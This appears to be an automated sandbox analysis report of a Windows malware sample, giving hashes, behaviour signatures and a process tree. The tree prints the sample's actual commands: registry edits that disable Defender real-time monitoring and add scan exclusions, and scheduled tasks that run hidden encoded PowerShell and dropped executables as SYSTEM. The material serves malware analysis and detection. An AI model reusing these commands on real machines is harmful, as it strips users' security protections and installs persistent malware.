Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    137s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    25/09/2022, 00:21 UTC

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    7337ef601d50b390b496550bac53795d

  • SHA1

    0e3969b3304addf0fc41ff14f880a7dab400ec92

  • SHA256

    cd88cbaafd55d270581a97129700e818a5b6fced51ceaafedcd2b0dd5615f79d

  • SHA512

    1e50229a861b0f17b11e67bc9c08a2069da685c4bd1734be67dd360efb6ab6016c63723d999fda2c32ed4e24f43e9c1c8aa294dd213459d0cbfbda8f795e3b73

  • SSDEEP

    196608:91O/KbCwDiHUzdFQvK/k2pCgjYo46foOyTxCMj+7NdYn:3OybCqi0zPQvKsP+YR6UxNK7Nen

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 23 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Users\Admin\AppData\Local\Temp\7zSF519.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Users\Admin\AppData\Local\Temp\7zSF8B2.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Loads dropped DLL
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:268
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1436
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:1152
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:1780
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1856
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1560
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:1536
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:1316
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gaTWkmFFb" /SC once /ST 00:09:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:1956
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gaTWkmFFb"
                  4⤵
                    PID:1176
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gaTWkmFFb"
                    4⤵
                      PID:940
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bNHXguvSZYiOwSiXLC" /SC once /ST 02:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\zWCOKOW.exe\" 3x /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:1072
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {E1A27B33-3CE5-4F17-BA5C-1EDBDF942972} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
                1⤵
                  PID:1800
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1464
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:836
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                      2⤵
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:392
                      • C:\Windows\system32\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        3⤵
                          PID:1480
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:268
                        • C:\Windows\system32\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          3⤵
                            PID:1628
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                          2⤵
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1912
                          • C:\Windows\system32\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            3⤵
                              PID:1012
                        • C:\Windows\system32\gpscript.exe
                          gpscript.exe /RefreshSystemParam
                          1⤵
                            PID:2024
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {1C37D38B-8C0A-4548-94A9-9C30433842AF} S-1-5-18:NT AUTHORITY\System:Service:
                            1⤵
                              PID:1644
                              • C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\zWCOKOW.exe
                                C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\zWCOKOW.exe 3x /site_id 525403 /S
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                PID:1284
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gEudqPczZ" /SC once /ST 01:55:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:1372
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gEudqPczZ"
                                  3⤵
                                    PID:2000
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "gEudqPczZ"
                                    3⤵
                                      PID:788
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      3⤵
                                        PID:1384
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                          4⤵
                                          • Modifies Windows Defender Real-time Protection settings
                                          PID:272
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                        3⤵
                                          PID:1568
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                            4⤵
                                            • Modifies Windows Defender Real-time Protection settings
                                            PID:968
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "gftZOGczE" /SC once /ST 00:26:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:2004
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /run /I /tn "gftZOGczE"
                                          3⤵
                                            PID:1184
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gftZOGczE"
                                            3⤵
                                              PID:2008
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                                PID:1616
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1344
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
                                                3⤵
                                                  PID:1476
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:468
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                    PID:1032
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:1384
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:1612
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1488
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C copy nul "C:\Windows\Temp\MYjwJFnMfsmfKHMw\dQWBuaiK\VmxezyLdhJrwFOAG.wsf"
                                                          3⤵
                                                            PID:1780
                                                          • C:\Windows\SysWOW64\wscript.exe
                                                            wscript "C:\Windows\Temp\MYjwJFnMfsmfKHMw\dQWBuaiK\VmxezyLdhJrwFOAG.wsf"
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:1928
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1352
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1224
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1176
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1992
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1028
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1688
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1664
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2020
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:2044
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:912
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:652
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:296
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • Windows security bypass
                                                                  PID:1032
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                  • Windows security bypass
                                                                  PID:1488
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • Windows security bypass
                                                                  PID:1564
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                  • Windows security bypass
                                                                  PID:1940
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                    PID:1908
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                      PID:108
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:2024
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:1992
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                            PID:1012
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                              PID:1924
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                                PID:1980
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:64
                                                                                4⤵
                                                                                  PID:1616
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                    PID:1476
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:64
                                                                                    4⤵
                                                                                      PID:1860
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:32
                                                                                      4⤵
                                                                                        PID:812
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                        • Windows security bypass
                                                                                        PID:296
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                          PID:1504
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:64
                                                                                          4⤵
                                                                                            PID:1512
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:32
                                                                                            4⤵
                                                                                              PID:1468
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:64
                                                                                              4⤵
                                                                                                PID:1956
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "gyfOkrEjS" /SC once /ST 01:23:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:1020
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /run /I /tn "gyfOkrEjS"
                                                                                              3⤵
                                                                                                PID:1340
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "gyfOkrEjS"
                                                                                                3⤵
                                                                                                  PID:1616
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                  3⤵
                                                                                                    PID:1860
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                      4⤵
                                                                                                        PID:2008
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                      3⤵
                                                                                                        PID:1684
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                          4⤵
                                                                                                            PID:820
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /CREATE /TN "VgOpnHVQDAdMZqNFB" /SC once /ST 01:13:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\VayHmEV.exe\" aF /site_id 525403 /S" /V1 /F
                                                                                                          3⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:1032
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /run /I /tn "VgOpnHVQDAdMZqNFB"
                                                                                                          3⤵
                                                                                                            PID:2004
